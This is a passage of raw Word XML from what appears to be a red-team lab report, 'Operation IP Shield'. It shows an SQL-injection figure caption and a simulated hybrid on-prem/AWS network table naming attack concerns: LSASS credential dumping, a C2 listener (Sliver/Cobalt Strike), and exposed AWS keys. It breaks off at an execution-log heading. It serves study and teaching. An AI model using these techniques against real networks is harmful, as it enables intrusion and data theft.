                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E57B59" w14:textId="6F41E1BD" w:rsidR="00BE0420" w:rsidRDefault="00A458DB" w:rsidP="00A458DB">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure: 29 - This figure depicts the modification of SQL-Injection with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>passoword</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> bypass policy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C0B6EA" w14:textId="434DE683" w:rsidR="00381E3D" w:rsidRDefault="00381E3D" w:rsidP="00381E3D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc215571137"/>
      <w:r>
        <w:t>Simulated Hybrid Architecture</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="6A35FA3C" w14:textId="7E170037" w:rsidR="00381E3D" w:rsidRDefault="00381E3D" w:rsidP="00381E3D">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The simulated environment mimics the target structure using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D07609">
        <w:t>virtualisation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> technology (e.g., VMware or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>VirtualBox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33CDB7B9" w14:textId="77777777" w:rsidR="00381E3D" w:rsidRDefault="00381E3D" w:rsidP="00381E3D">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>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05"/>
        <w:gridCol w:w="2632"/>
        <w:gridCol w:w="2450"/>
        <w:gridCol w:w="2683"/>
      </w:tblGrid>
      <w:tr w:rsidR="00381E3D" w14:paraId="247F4136" w14:textId="77777777" w:rsidTr="00381E3D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1660" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="760E0B92" w14:textId="77777777" w:rsidR="00381E3D" w:rsidRPr="00381E3D" w:rsidRDefault="00381E3D">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="002060"/>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00381E3D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="002060"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>Component</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2602" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="13DED84D" w14:textId="77777777" w:rsidR="00381E3D" w:rsidRPr="00381E3D" w:rsidRDefault="00381E3D">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="002060"/>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00381E3D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="002060"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>Role</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="671CC9FA" w14:textId="77777777" w:rsidR="00381E3D" w:rsidRPr="00381E3D" w:rsidRDefault="00381E3D">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="002060"/>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00381E3D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="002060"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>IP Address (Example)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="567D6B03" w14:textId="77777777" w:rsidR="00381E3D" w:rsidRPr="00381E3D" w:rsidRDefault="00381E3D">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="002060"/>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00381E3D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="002060"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>Key Security Concern</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00381E3D" w14:paraId="2690A1D9" w14:textId="77777777" w:rsidTr="00381E3D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1660" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="40F57668" w14:textId="77777777" w:rsidR="00381E3D" w:rsidRDefault="00381E3D" w:rsidP="00DB1E69">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t>CPC-DC01</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (On-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Prem</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2602" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="23CC39B1" w14:textId="77777777" w:rsidR="00381E3D" w:rsidRDefault="00381E3D">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
            </w:pPr>
            <w:r>
              <w:t>Windows Server 2019 Domain Controller</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6CCE00D5" w14:textId="77777777" w:rsidR="00381E3D" w:rsidRDefault="00381E3D">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
            </w:pPr>
            <w:r>
              <w:t>192.168.1.10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3602DACC" w14:textId="77777777" w:rsidR="00381E3D" w:rsidRDefault="00381E3D">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
            </w:pPr>
            <w:r>
              <w:t>Credential Dumping (LSASS), GPO weakness.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00381E3D" w14:paraId="082C3A1C" w14:textId="77777777" w:rsidTr="00381E3D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1660" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="159DBE3A" w14:textId="77777777" w:rsidR="00381E3D" w:rsidRDefault="00381E3D" w:rsidP="00DB1E69">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t>CPC-WS01</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (On-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Prem</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2602" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5F9779FB" w14:textId="77777777" w:rsidR="00381E3D" w:rsidRDefault="00381E3D">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
            </w:pPr>
            <w:r>
              <w:t>Windows 10 Workstation (Phishing Target)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="512F73E4" w14:textId="77777777" w:rsidR="00381E3D" w:rsidRDefault="00381E3D">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
            </w:pPr>
            <w:r>
              <w:t>192.168.1.50</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="247DC646" w14:textId="77777777" w:rsidR="00381E3D" w:rsidRDefault="00381E3D">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
            </w:pPr>
            <w:r>
              <w:t>Initial Access, Endpoint Detection.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00381E3D" w14:paraId="6797D0F9" w14:textId="77777777" w:rsidTr="00381E3D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1660" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="23BDED03" w14:textId="77777777" w:rsidR="00381E3D" w:rsidRDefault="00381E3D" w:rsidP="00DB1E69">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>CPC-FW</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (On-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Prem</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/Edge)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2602" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="483A3F57" w14:textId="77777777" w:rsidR="00381E3D" w:rsidRDefault="00381E3D">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
            </w:pPr>
            <w:r>
              <w:t>Firewall/VPN Gateway</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7D9CCFBB" w14:textId="77777777" w:rsidR="00381E3D" w:rsidRDefault="00381E3D">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
            </w:pPr>
            <w:r>
              <w:t>192.168.1.1/External IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="03DA450E" w14:textId="77777777" w:rsidR="00381E3D" w:rsidRDefault="00381E3D">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
            </w:pPr>
            <w:r>
              <w:t>Perimeter Protection, C2 traffic inspection.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00381E3D" w14:paraId="706DEB08" w14:textId="77777777" w:rsidTr="00381E3D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1660" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4638C4B6" w14:textId="77777777" w:rsidR="00381E3D" w:rsidRDefault="00381E3D" w:rsidP="00DB1E69">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t>Attacker C2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2602" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0ADF554F" w14:textId="77777777" w:rsidR="00381E3D" w:rsidRDefault="00381E3D">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
            </w:pPr>
            <w:r>
              <w:t>C2 Listener (Sliver/Cobalt Strike)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="34D86D59" w14:textId="77777777" w:rsidR="00381E3D" w:rsidRDefault="00DB1E69">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
            </w:pPr>
            <w:r>
              <w:t>Attacker External IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6DE7CB44" w14:textId="77777777" w:rsidR="00381E3D" w:rsidRDefault="00381E3D">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
            </w:pPr>
            <w:r>
              <w:t>Traffic Evasion (HTTPS/DNS).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00381E3D" w14:paraId="559870CF" w14:textId="77777777" w:rsidTr="00381E3D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1660" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="43DE9182" w14:textId="77777777" w:rsidR="00381E3D" w:rsidRDefault="00381E3D" w:rsidP="00DB1E69">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t>AWS-VPC-01</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (Cloud)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2602" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4C810EF4" w14:textId="77777777" w:rsidR="00381E3D" w:rsidRDefault="00381E3D">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
            </w:pPr>
            <w:r>
              <w:t>Virtual Private Cloud Subnet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0E27819B" w14:textId="77777777" w:rsidR="00381E3D" w:rsidRDefault="00381E3D">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
            </w:pPr>
            <w:r>
              <w:t>10.0.1.0/24</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1CA3DE6B" w14:textId="77777777" w:rsidR="00381E3D" w:rsidRDefault="00381E3D">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
            </w:pPr>
            <w:r>
              <w:t>Network Segmentation, Flow Monitoring.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00381E3D" w14:paraId="0A3ECE59" w14:textId="77777777" w:rsidTr="00381E3D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1660" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="542C890B" w14:textId="77777777" w:rsidR="00381E3D" w:rsidRDefault="00381E3D" w:rsidP="00DB1E69">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t>Research-Server-01</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (Cloud)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2602" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4B924EA6" w14:textId="77777777" w:rsidR="00381E3D" w:rsidRDefault="00381E3D">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
            </w:pPr>
            <w:r>
              <w:t>EC2 Instance hosting research data</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="46E02679" w14:textId="77777777" w:rsidR="00381E3D" w:rsidRDefault="00381E3D">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
            </w:pPr>
            <w:r>
              <w:t>10.0.1.50</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2030C694" w14:textId="77777777" w:rsidR="00381E3D" w:rsidRDefault="00381E3D">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
            </w:pPr>
            <w:r>
              <w:t>Misconfigured IAM Roles/Profiles.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00381E3D" w14:paraId="2F0C3687" w14:textId="77777777" w:rsidTr="00381E3D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1660" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="267ED0C0" w14:textId="77777777" w:rsidR="00381E3D" w:rsidRDefault="00381E3D" w:rsidP="00DB1E69">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t>S3 Target Bucket</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2602" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6A1B13DD" w14:textId="77777777" w:rsidR="00381E3D" w:rsidRDefault="00381E3D">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
            </w:pPr>
            <w:r>
              <w:t>Storage for final research data</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2BD5F561" w14:textId="77777777" w:rsidR="00381E3D" w:rsidRDefault="00381E3D">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00DB1E69">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>cpc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00DB1E69">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>-research-data-staging</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4A3359E3" w14:textId="77777777" w:rsidR="00381E3D" w:rsidRDefault="00381E3D">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
            </w:pPr>
            <w:r>
              <w:t>Access Key Exposure, Logging.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0294A373" w14:textId="77777777" w:rsidR="005C0756" w:rsidRDefault="005C0756" w:rsidP="00381E3D">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60493C9C" w14:textId="77777777" w:rsidR="003B18EB" w:rsidRDefault="003B18EB" w:rsidP="00381E3D">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74A71A24" w14:textId="77777777" w:rsidR="003B18EB" w:rsidRDefault="003B18EB" w:rsidP="00381E3D">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49A2BF61" w14:textId="77777777" w:rsidR="003B18EB" w:rsidRDefault="003B18EB" w:rsidP="00381E3D">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34CA5A90" w14:textId="77777777" w:rsidR="00A7467C" w:rsidRDefault="00381E3D" w:rsidP="00381E3D">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="00381E3D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Network Diagram Summary:</w:t>
      </w:r>
      <w:r w:rsidRPr="00381E3D">
        <w:rPr>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>The network consists of a flat on-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>prem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> network segment and a segregated AWS VPC. A secure VPN tunnel connects the two environments. The critical weakness simulated is a service account (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>SVC_AWS_SYNC</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) being used interactively on a user workstation, and an EC2 instance that </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
        </w:rPr>
        <w:t>briefly</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> hosted a plaintext file containing an AWS Access Key/Secret Key pair for a "Cloud Admin" role that was accessible via the pivot host.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA8B070" w14:textId="77777777" w:rsidR="00A7467C" w:rsidRDefault="00A7467C" w:rsidP="00381E3D">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D425A04" w14:textId="77777777" w:rsidR="00A7467C" w:rsidRDefault="00A7467C" w:rsidP="00381E3D">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="712608E1" w14:textId="77777777" w:rsidR="00A7467C" w:rsidRDefault="00A7467C" w:rsidP="00381E3D">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B574679" w14:textId="77C5E405" w:rsidR="00A7467C" w:rsidRDefault="00A7467C" w:rsidP="00381E3D">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="00384BDB">
        <w:rPr>
          <w:rStyle w:val="Heading4Char"/>
          <w:noProof/>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7DC98960" wp14:editId="65A86FD7">
            <wp:extent cx="5943600" cy="27444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3600" cy="2744470"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B39B96" w14:textId="77777777" w:rsidR="001C0224" w:rsidRDefault="001C0224" w:rsidP="00381E3D">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C648D74" w14:textId="77777777" w:rsidR="001C0224" w:rsidRDefault="001C0224" w:rsidP="00381E3D">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58936B50" w14:textId="77777777" w:rsidR="001C0224" w:rsidRDefault="001C0224" w:rsidP="00381E3D">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E782D91" w14:textId="77777777" w:rsidR="00A7467C" w:rsidRDefault="00A7467C" w:rsidP="00381E3D">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AF8717D" w14:textId="13E1EC61" w:rsidR="00F50BFC" w:rsidRDefault="005C0756" w:rsidP="00F50BFC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc215571138"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidR="00381E3D">
        <w:t xml:space="preserve">xecution Log and TTPs </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D07609">
        <w:t>Utilised</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00381E3D">
        <w:t xml:space="preserve"> (Detailed Lab Report)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="6826ADF0" w14:textId="77777777" w:rsidR="005C0756" w:rsidRDefault="005C0756" w:rsidP="00381E3D">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0751F898" w14:textId="339CED3C" w:rsidR="00141FDA" w:rsidRDefault="00381E3D" w:rsidP="00381E3D">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The following log details the multi-step execution of "Operation IP Shield," focusing on the technical procedures and forensic </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D07609">
